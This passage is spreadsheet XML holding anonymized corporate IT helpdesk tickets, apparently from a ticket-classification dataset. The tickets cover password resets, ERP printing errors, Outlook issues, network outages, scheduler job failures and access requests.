    <s v="_x000a__x000a_received from: zqbmxdgy.stuwbacm@gmail.com_x000a__x000a_hello team,_x000a__x000a_can you please arrange a business card for me , please find the details below and let me know the protocol for the same ._x000a__x000a_zqbmxdgy stuwbacm_x000a_analyst -   apps  dev maintenance &amp; ebus _x000a_zqbmxdgy.stuwbacm@gmail.com&lt;mailto:zqbmxdgy.stuwbacm@gmail.com&gt;_x000a__x000a_warm "/>
    <s v="zqbmxdgy stuwbacm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="to remove plant_101 plant assignment to sale orgs 1444 &amp; 1445 - romania &amp; slovakia project related"/>
    <s v="this was supposed to be removed immediately after uat, however we missed removing this assignment. shipment from plant_101 was assigned only for uacyltoe hxgayczeing purposes. business requirement may come in future. "/>
    <s v="ospmbweg peswfcbj"/>
    <x v="12"/>
  </r>
  <r>
    <s v="business card request"/>
    <s v="_x000a__x000a_received from: zqbmxdgy.stuwbacm@gmail.com_x000a__x000a_hello team,_x000a__x000a_can you please arrange a business card for me , please find the details below and let me know the protocol for the same ._x000a__x000a_zqbmxdgy stuwbacm_x000a_analyst -   apps  dev maintenance &amp; ebus -  erp sd _x000a_zqbmxdgy.stuwbacm@gmail.com&lt;mailto:zqbmxdgy.stuwbacm@gmail.com&gt;_x000a__x000a__x000a_warm "/>
    <s v="zqbmxdgy stuwbacm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wegen ein sicherheitsupdate kb4272050 sind keine netzwerkverbindung moeglich"/>
    <s v="wegen ein sicherheitsupdate kb4272050 sind keine netzwerkverbindung moeglich._x000d__x000a__x000d__x000a_fehlermeldung : keine netzwerk verbinung."/>
    <s v="szfaidhy sivyugjd"/>
    <x v="32"/>
  </r>
  <r>
    <s v="change o365 license fron s1 to k1"/>
    <s v="could you please changes the o365 license  of the following employees from &quot;s1&quot;  to &quot;k1&quot;_x000a_luifdsts olhryhira  - 3005661000_x000a_cost center pam003_x000a_maertosv 315463440 krsxguty odqpwsgi krsxguty.odqpwsgi@gmail.com_x000a_soarewer1 31543252 uzavdmoj wrpkolzq uzavdmoj.wrpkolzq@gmail.com_x000a_alvesdss 315534434 kgcw isyfngdz ziqmkgcw.isyfngdz@gmail.com_x000a_machasssg 315423428 puxqyesm xqathyuz gislei.machado@company.com_x000a_peredrfifj 315484560 flavio pereira flavio.pereira@company.com_x000a_schidrftas 315453454 maihdlne xodeqlsv maihdlne.xodeqlsv@gmail.com_x000a_vieiresddr 315463249 dfjbnrem vabqwxlm dfjbnrem.vabqwxlm@gmail.com_x000a_albussdqp 31565532 imeytghj lyrikzep imeytghj.lyrikzep@gmail.com_x000a_larsffar 3156232361 rafaelm lara aiuknwzj.nbsjzkqa@gmail.com_x000a_ribewddwic 315252651 fhkebpyx tqpermnu fhkebpyx.tqpermnu@gmail.com_x000a_carmsswot 31525455 uvyjpixc kbfcrauw uvyjpixc.kbfcrauw@gmail.com_x000a_garcisdwr 31552598 rodrigo fernansdes garcia rodrigofernandes.garcia@company.com_x000a_olivesswc2 315271 gcbrdkzl oamkcufr cassio.olibercsu@company.com_x000a_placisddwd 31502561 douglas placido douglas.placido@company.com_x000a__x000a_grateful!_x000a_"/>
    <s v="ufawcgob aowhxjky"/>
    <x v="33"/>
  </r>
  <r>
    <s v="HostName_1003:( kisp - iis - app server production )disk free on e:\ is now 15%, which is below the warning threshold (15%)  "/>
    <s v="HostName_1003:( kisp - iis - app server production )disk free on e:\ is now 15%, which is below the warning threshold (15%)  "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="orders can not be printed."/>
    <s v="es kann keine auftrag gedruckt werden. ziehe fehler. "/>
    <s v="bfjnyqhe wqhuvlfb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="change erp logon language from german to english"/>
    <s v="change erp logon language from german to english"/>
    <s v="vuefwrmk snaelbgp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset for user mertut"/>
    <s v="erp SID_34 password reset for user mertut"/>
    <s v="ughzilfm cfibdamq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked_x000d__x000a_"/>
    <s v="tfnzwycd bicohjga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please reset erp SID_34 password for user peilerk - thank you!"/>
    <s v="_x000d__x000a__x000d__x000a_received from: krdvgzeh.yboasemp@gmail.com_x000d__x000a__x000d__x000a_Ã¼dvÃ¶zlettel / mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="krdvgzeh yboasemp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printing"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yfmaqovp.wdonhbez@gmail.com_x000d__x000a__x000d__x000a_hello all,_x000d__x000a__x000d__x000a_do you have any news about the issue of printing of drawings and production papers?_x000d__x000a_when is the issue solved?_x000d__x000a_"/>
    <s v="yfmaqovp wdonhbez"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot release order / does not print "/>
    <s v="plant_108 -&gt; SID_34"/>
    <s v="mvwiygou rpkscnlv"/>
    <x v="44"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="ydigzqbu xdgjizek"/>
    <x v="72"/>
  </r>
  <r>
    <s v="erp/SID_34 - production orders cannot be printed out"/>
    <s v="error:_x000d__x000a_verbindung zu system production_order_interface_app-fu mit destination_x000d__x000a_production_order_interface_vendor-connc-fu fehlerhaft:_x000d__x000a_fehler beim Ã¶ffnen einer rfc-verbindung (cpic-call_x000d__x000a_(1)."/>
    <s v="slbfmqpa qdroplyz"/>
    <x v="44"/>
  </r>
  <r>
    <s v="restore some folders for stoebtrt"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sxhcapoe.kbluefip@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_path to the folder:_x000d__x000a_\\HostName_705\departments\lean\leanÂ³-projekte\lean-projekte_geplant\fy17&lt;file:///\\HostName_705\departments\lean\leanÂ³-projekte\lean-projekte_geplant\fy17&gt;_x000d__x000a__x000d__x000a__x000d__x000a_--_x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="sxhcapoe kbluefip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_37hotf"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_37hotf at 08/11/16 04:35:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="wir haben hier in koenigsee probleme mit dem druck aus erp. es kommt ein &quot;production_order_interface_app&quot; fehler."/>
    <s v="wir haben hier in koenigsee probleme mit dem druck aus erp. es kommt ein &quot;production_order_interface_app&quot; fehler._x000d__x000a_"/>
    <s v="ludhvmro okdbwcsu"/>
    <x v="13"/>
  </r>
  <r>
    <s v="error drucker"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gsnuhpji.qpyfctwl@gmail.com_x000d__x000a__x000d__x000a_es wird nichts mehr ausgedruckt_x000d__x000a_fehlermeldung_x000d__x000a_[cid:image001.png@01d1f3ba.6428d800]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="gsnuhpji qpyfctwl"/>
    <x v="32"/>
  </r>
  <r>
    <s v="setup new ws \chkzbeav ykeilmog"/>
    <s v="setup new ws \chkzbeav ykeilmog"/>
    <s v="chkzbeav ykeilmog"/>
    <x v="24"/>
  </r>
  <r>
    <s v="no connection to the production_order_interface_app-fu (production_order_interface_vendor connc fu)"/>
    <s v="hello,_x000d__x000a__x000d__x000a_we have no connection to the plsseald-fu server. i think the server is down._x000d__x000a_we can't print production orders in germany_x000d__x000a__x000d__x000a__x000d__x000a_no connection to the production_order_interface_app-fu (production_order_interface_vendor connc fu)_x000d__x000a_error rfc connection (cpic-call)"/>
    <s v="qyndvmlw imcvznow"/>
    <x v="44"/>
  </r>
  <r>
    <s v="probleme mit erpgui \tmqfjard qzhgdoua"/>
    <s v="probleme mit erpgui \tmqfjard qzhgdoua"/>
    <s v="tmqfjard qzhgdoua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \ylhptzmd owslfzqi"/>
    <s v="setup new ws \ylhptzmd owslfzqi"/>
    <s v="ylhptzmd owslfzqi"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \wphqnxly htvrbxmd"/>
    <s v="setup new ws \wphqnxly htvrbxmd"/>
    <s v="wphqnxly htvrbxmd"/>
    <x v="24"/>
  </r>
  <r>
    <s v="barcode scanner defekt \pifyudbo tagsfbny"/>
    <s v="barcode scanner defekt \pifyudbo tagsfbny"/>
    <s v="pifyudbo tagsfbny"/>
    <x v="24"/>
  </r>
  <r>
    <s v="business_client issue"/>
    <s v="1.) search material code are unavailable that seraching result is 0 via &quot;specification&quot;_x000d__x000a_"/>
    <s v="ewylacup jlibymtw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="elengineering toolonic ethics for employee cajdwtgq breqgycv - training course not activated"/>
    <s v="_x000d__x000a__x000d__x000a_received from: aofnvyzt.eqiyskhm@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a_good morning_x000d__x000a__x000d__x000a_please your help to add ethics training course to my csr member , cajdwtgq breqgycv._x000d__x000a__x000d__x000a_daria is working in company since march 2015 and despite all our requests since she joined company_x000d__x000a_she never received the training course invitation as required to be completed by all employees._x000d__x000a__x000d__x000a_we've answered the below questions by your request,_x000d__x000a_if further info is required, please let us know._x000d__x000a__x000d__x000a_"/>
    <s v="aofnvyzt eqiyskhm"/>
    <x v="23"/>
  </r>
  <r>
    <s v="outlook issues,yesterday my outlook took about2 hours to load ,  afterit was very very slow. today can not open outlook"/>
    <s v="outlook issues,yesterday my outlook took about2 hours to load ,  afterit was very very slow. today can not open outlook anymore_x000d__x000a_please check "/>
    <s v="pcqjvair kxaoumqy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dell 4 in 1"/>
    <s v="dell 4 in 1 adapter not working"/>
    <s v="ntuhoafg bzwefjvk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="pc is not booting up"/>
    <s v="pc is not booting up. user has already spoken to steffen._x000d__x000a__x000d__x000a_computer name : eagw8111608_x000d__x000a_ext : 591"/>
    <s v="azyfsrqh wkavqigu"/>
    <x v="28"/>
  </r>
  <r>
    <s v="read and write access to oe drive fÃ¼rth"/>
    <s v="_x000d__x000a__x000d__x000a_received from: scjxobhd.ldypjkmf@gmail.com_x000d__x000a__x000d__x000a_hello help team ,_x000d__x000a__x000d__x000a_can you pls. arrange read &amp; write access for dveuglzp mqetjxwp to the following oe drive on teams\\eagcldaten\teams:_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image002.jpg@01d1ee5f.057a25d0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="scjxobhd ldypjkmf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client issue"/>
    <s v="specification searching in SID_34 is not returning any results ... works okay in SID_1"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="13"/>
  </r>
  <r>
    <s v="issue on pricing in distributor_tool"/>
    <s v="we have agreed price with many of the distributors for a given period and skus.  this is specified through pricing condition zcnc in erp.  in distributor_tool, it is order through sold to &amp; ship to combination._x000d__x000a_-       till august â€“ flat rate deployment, we did not have any issues._x000d__x000a_-       today, when the distributor tried to book the order with zcnc pricing condition. the initial screen shows the correct price. but when the item is selected and quick order is clicked on, the price is getting changed to list price less standard discount instead of retaining the zcnc price."/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="21"/>
  </r>
  <r>
    <s v="network outage :  melbourne (rowville) site is hard down at 01:34 am et on 08/11. "/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________01:34 am et on 08/11__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no_____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _no_______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____yes phone warehouse_tool mail_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____no_______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  _____no__     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ____yes____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="7"/>
  </r>
  <r>
    <s v="desktop notworking"/>
    <s v="desktop connected to the phone system in server room at company is not working. please could you troubleshoot and fix the problem._x000d__x000a__x000d__x000a_"/>
    <s v="jvhqyamt wodzrcjg"/>
    <x v="18"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1148"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1148 at 08/11/16 01:15:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="power adaptor in docking station is faulty"/>
    <s v="if i connect my laptop to docking station and try to power on, encounter the attached message. have confirmed that the message does not appear if i use external adaptor or another docking station. serial number of docking station is qad1234013705. _x000a__x000a_location: 4k-25. _x000a_"/>
    <s v="wjbtlxry gdbqzjyw"/>
    <x v="18"/>
  </r>
  <r>
    <s v="circuit outage: mpls ciruit is down at matlxjgi elrndiuy since 12:19am et on 08/11. site is up on vpn."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______12:19am et on 08/11___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yes____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   __yes______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___no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uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="i can't login skype after change password "/>
    <s v="i can't login skype after change password , but other application is ok "/>
    <s v="mcysxfjw pcrdoewx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="89.61.05.183 - thermal warning "/>
    <s v="89.61.05.183 - the temperature of the switch has reached red threshold. "/>
    <s v="wczegmok bgqoclvs"/>
    <x v="3"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for mvkpjdfi.guexyfpk@gmail.com"/>
    <s v="request to reset microsoft online services password for mvkpjdfi.guexyfpk@gmail.com"/>
    <s v="mvkpjdfi guexyfpk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook search issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: duoyrpvi.wgjpviul@gmail.com_x000d__x000a__x000d__x000a_hi team,_x000d__x000a__x000d__x000a_my outlook is failing to bring up emails in my search function:_x000d__x000a__x000d__x000a_[cid:image001.png@01d1f3b2.4bb18b30]_x000d__x000a__x000d__x000a_i have tried to rebuild the indexing but it fails. this has been happening all week._x000d__x000a__x000d__x000a_i need to be able to use this function._x000d__x000a__x000d__x000a_"/>
    <s v="nehxmtpg xepltzqf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="help to install symantec in a computer lpaw7404734"/>
    <s v="hi team, i need your help to reinstall antivirus (symantec) in a computer lpaw8515845. the symantec don't working._x000d__x000a__x000d__x000a_if you have more doubts, please contact me."/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="49"/>
  </r>
  <r>
    <s v="dell 7350: pc boot up  failure.urgent "/>
    <s v="dell 7350: pc boot up  failure._x000a_-had to try restart the pc multiple times._x000a_the system reboots automatically.in a loop._x000a_-finally got the pc up and running._x000a_-seems to be issue with the pc .again the pc shut down._x000a_computer name: lmsl9516544_x000a_-os: win 8_x000a_-contact : "/>
    <s v="qwreamdz pmarxvtk"/>
    <x v="2"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_461"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_461 at 08/10/16 17:44:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="new employee mikhghytr karaffa - needs new desk phone"/>
    <s v="new employee mikhghytr karaffa - needs new desk phone_x000a__x000a_phone: "/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="2"/>
  </r>
  <r>
    <s v="global erp crm:  it appears that erp crm is trying to send the &quot;review by sales&quot; email to the customer contact."/>
    <s v="global erp crm:  it appears that erp crm is trying to send the &quot;review by sales&quot; email to the customer contact.  the &quot;review by sales&quot; email was originally configured so that it would only get sent to the sales employee.  the &quot;review by sales&quot; email should never get sent to the customer contact.  examples 7611181804, 7611181405, 7611181483.  refer to the attached screen shots.  did someone change something?  please investigate and advise aerp."/>
    <s v="aoyrspjv hctgfeal"/>
    <x v="14"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="mobile device activation"/>
    <s v="aqritplu beuflorc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to install engineering_tool"/>
    <s v="unable to install engineering_tool"/>
    <s v="anpocezt qturbxsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset for bsopzxhi irfhcgzq"/>
    <s v="password reset for bsopzxhi irfhcgzq"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xzjlkfvc.agfmpyhr@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_please reset my password and sending the password to log in._x000d__x000a_well "/>
    <s v="xzjlkfvc agfmpyhr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="create sso for qiyujevw ogadikxv"/>
    <s v="create purchasingupstreamsso ad group for qiyujevw ogadikxv (wanrtygm3). the samaccountname in ad is to be all lower case."/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unlock account  email  in cell phone the user michthey olivgtyera id: olivgtyemc"/>
    <s v="hello team,_x000a__x000a_could you please unlock account  email  in cell phone the user michthey olivgtyera id: olivgtyemc_x000a__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1953d"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1953d at 08/10/16 14:57:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="dynamics crm advanced find ribbon issue"/>
    <s v="the ribbon in advanced find is displaced making it difficult to query the system/create views. (see attached)"/>
    <s v="siqobhlz vwljuize"/>
    <x v="39"/>
  </r>
  <r>
    <s v="when using phone, connection is intermittent.  cannot use desk phone for calls and skype meetings."/>
    <s v="my cell phone is _x000a_other people at jc have complained about the same thing."/>
    <s v="aedwrpvo qbpafrsx"/>
    <x v="3"/>
  </r>
  <r>
    <s v="vpn link "/>
    <s v="vpn link "/>
    <s v="wbecophk uwntkiar"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="sbvlxuwm yanbikrx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error in accessing reporting_engineering_tool"/>
    <s v="error in accessing reporting_engineering_tool_x000d__x000a__x000d__x000a_bill, this would need to be a ticket.  gso â€“ please assign to the analytics technical team.  might be that the t account for magda is locked out; can republish using an analytics t account._x000d__x000a__x000d__x000a_"/>
    <s v="urhpnlaf agmsfqil"/>
    <x v="8"/>
  </r>
  <r>
    <s v="engineering tool - permition to sign in - include user id on cad users list "/>
    <s v="i need have access on engineering tool, however when i tried do logon engineering tool show me te message that i had permission . _x000a__x000a_please include my user id on cad user list. _x000a__x000a_let me know if you need more information. _x000a__x000a_contact phone: _x000a_"/>
    <s v="qdgcilzf cpzlmesa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for esias bosch using password_management_tool password reset."/>
    <s v="the"/>
    <s v="paqrentz gcnyaxsb"/>
    <x v="16"/>
  </r>
  <r>
    <s v="error login on to the SID_34 system."/>
    <s v="error login on to the SID_34 system._x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-user has tried the password_management_tool pwd manager._x000d__x000a_-unlocked the erp id._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="aylrbosw gaeycbwd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reporting_tool web link in crm not opening up"/>
    <s v="reporting_tool web link in crm not opening up"/>
    <s v="fpbmtxei jtqbcnfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sharepiont discount request error"/>
    <s v="infopath cannot submit the form._x000d__x000a_an error occurred while the form was being submitted._x000d__x000a_the form cannot be submitted to the following location: _x000d__x000a_the site may be offline, read-only, or otherwise unavailable._x000d__x000a_access denied. before opening files in this location, you must first add the web site to your trusted sites list, browse to the web site, and select the option to login automatically._x000d__x000a__x000d__x000a_"/>
    <s v="dymwulbi dkbvqhna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access"/>
    <s v="name:nxloukai cpbzkrel_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:nxloukai.cpbzkrel@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i need an update on my it ticket ticket_no1530185...this needs to be resolved aerp"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="xeocpjsu hqwxumfb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company center page does not load"/>
    <s v="company center page does not load"/>
    <s v="fpbmtxei jtqbcnfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system login issue."/>
    <s v="login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and unlocked the account._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that she was able to login._x000d__x000a_-issue resolved."/>
    <s v="ybplwrez lqcyehbf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="netweaver not working"/>
    <s v="netweaver not working_x000a__x000a_name:iauqlrjk nijdaukz_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:iauqlrjk.nijdaukz@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am not able to open net weaver business client, i receive an error that microsoft .net framdntyework 4.5 is not installed and to contact my administrator."/>
    <s v="iauqlrjk nijdaukz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="qualys scan for required server completion HostName_17-new"/>
    <s v="category task owner_x000d__x000a_documentation see attached server profile forms nvyjtmca xjhpznds_x000d__x000a_global security create global groups and add the appropriate users security group_x000d__x000a_local security implement local users/groups/security_tool kathght shfhyw_x000d__x000a_monitoring add to reporting_tool monitoring/dac inventory erirtc baurhty/hoavdlwc ungksotp_x000d__x000a_sep add server to sep management server akisjtzm uvbmysgcbenezer/kishore nikam_x000d__x000a_sms/patching_antivirus_sw add server to sms/patching_antivirus_sw  shahid nawab_x000d__x000a_security run qualsys scan gzhapcld fdigznbk / ugyothfz ugrmkdhx_x000d__x000a_backup configure backup local/remote timnhyt rehtyulds/gdhyrts muggftyali _x000d__x000a_"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="shop_floor_app problems"/>
    <s v="from: vldwtjgr vtzakpol _x000d__x000a_sent: wednesday, august 10, 2016 8:27 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_cc: dctvfjrn oypnxftq_x000d__x000a_subject: amar re: shop_floor_app problems_x000d__x000a__x000d__x000a_help desk,_x000d__x000a__x000d__x000a_we are experiencing problems widtqkwzup vtkzuqly in the tinning cell. please assign the shop_floor_app support group to work on this issue. the operators are reporting that not all the production orders they are badging are posting. please let me know what further info you need from me._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vldwtjgr vtzakpol"/>
    <x v="42"/>
  </r>
  <r>
    <s v="engineering_tool error"/>
    <s v="engineering_tool error"/>
    <s v="mofjyqrh bcyzmkia"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset as its expired"/>
    <s v="name:ivxybewh ykhsqvnu_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ivxybewh.ykhsqvnu@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i need all of my passwords reset so i can log into my computer and into erp."/>
    <s v="ivxybewh ykhsqvnu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="navfgybz fuavxjzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vitalyst transfer: service unavailable on crm online"/>
    <s v="vitalyst transfer: service unavailable on crm online"/>
    <s v="wipzvlug urmdkgpa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="xeocpjsu hqwxumfb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hardware issue"/>
    <s v="when user is trying to use a separate computer t install a software he's getting a message stating that windows cannot connect to the domain either because the domain controller is down or otherwise unavailable or because your computer account was not found. this computer needs to replace a dead pc in the shop floor and user need to install a software to make it up and running."/>
    <s v="clgfntoe rhtmnzsk"/>
    <x v="2"/>
  </r>
  <r>
    <s v="call transferred to amfgtyartya for password "/>
    <s v="call transferred to amfgtyartya for password "/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="trying to access collaboration_platform site"/>
    <s v="_x000a__x000a_i'm trying to access this collaboration_platform site. i believe it was managed by bill gofgrthyuetz who left the company.  i requested access on 6/30/16 and haven't received a response._x000a__x000a_"/>
    <s v="etvendormhd xpslzunb"/>
    <x v="15"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="dpvnhlmb anzhbtfy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hi team, my laptop's random shut down problem still exists. it now shows &quot;no battery detected&quot;. "/>
    <s v="hi team, my laptop's random shut down problem still exists. i lose important unsaved data because of it. it now shows &quot;no battery detected&quot;. please replace battery or laptop or please rectify the issue as soon as possible."/>
    <s v="nwdlefxk epzrghnv"/>
    <x v="2"/>
  </r>
  <r>
    <s v="tfrbwoua aegpkruc unable to print from pdf"/>
    <s v="tfrbwoua aegpkruc unable to print from pdf"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent: need full py access for all german locations "/>
    <s v="hi,_x000a_could you please usa me full access + permissions for maintaining py data in erp for all german locations?_x000a_reference id can be mnakehrf mvunqihf or hess kagthrl-heyinz._x000a_approval can be provided by jywvemun qngschtz._x000a__x000a_"/>
    <s v="couskjgd uzojtkmh"/>
    <x v="19"/>
  </r>
  <r>
    <s v="increase the ramdnty from 80gb to 128 gb ramdnty for HostName_1045"/>
    <s v="increase the ramdnty from 80gb to 128 gb ramdnty for HostName_1045 server"/>
    <s v="vthuzanc fqdgotvx"/>
    <x v="11"/>
  </r>
  <r>
    <s v="reset password request for bobj"/>
    <s v="_x000a__x000a_received from: iqcylpok.ascpqvni@gmail.com_x000a__x000a_hello,_x000a__x000a_please reset my password for bobj in SID_37.  my user name is mcfgtydonn.  "/>
    <s v="iqcylpok ascpqvni"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zip code entered into erp account in SID_34 does not synch with msd crm"/>
    <s v="hello_x000d__x000a_account 81548372, zip code was updated in erp SID_34, however it does not move to msd crm, the error says the post code is not valid. do we know in what format the postal code should be entered for israel? can you/elogic share the rules regarding postal code formats with lucindaÂ´s team, please?_x000d__x000a__x000d__x000a_"/>
    <s v="ugephfta hrbqkvij"/>
    <x v="39"/>
  </r>
  <r>
    <s v="decommission of HostName_553-old"/>
    <s v="from: zmgsfner caltmgoe _x000d__x000a_sent: 15 july 2016 13:50_x000d__x000a_to: sadghryioshkurtyar  hiremath &lt;dcbligso.mfhquljk@gmail.com&gt;_x000d__x000a_cc: mfyivqes cpihaxbs &lt;mfyivqes.cpihaxbs@gmail.com&gt;_x000d__x000a_subject: HostName_553-old_x000d__x000a__x000d__x000a_hi_x000d__x000a__x000d__x000a_you can remove the old HostName_553 from the domain now._x000d__x000a__x000d__x000a_i have not needed to access it recently._x000d__x000a__x000d__x000a_let me know when you are done and i will power it down and move into storage._x000d__x000a__x000d__x000a_"/>
    <s v="zmgsfner caltmgoe"/>
    <x v="11"/>
  </r>
  <r>
    <s v="password reset request from o365"/>
    <s v="password reset request from o365"/>
    <s v="tlvcjdmk fbpvrqzh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="low disk space on lhqSID_1854 - f drive"/>
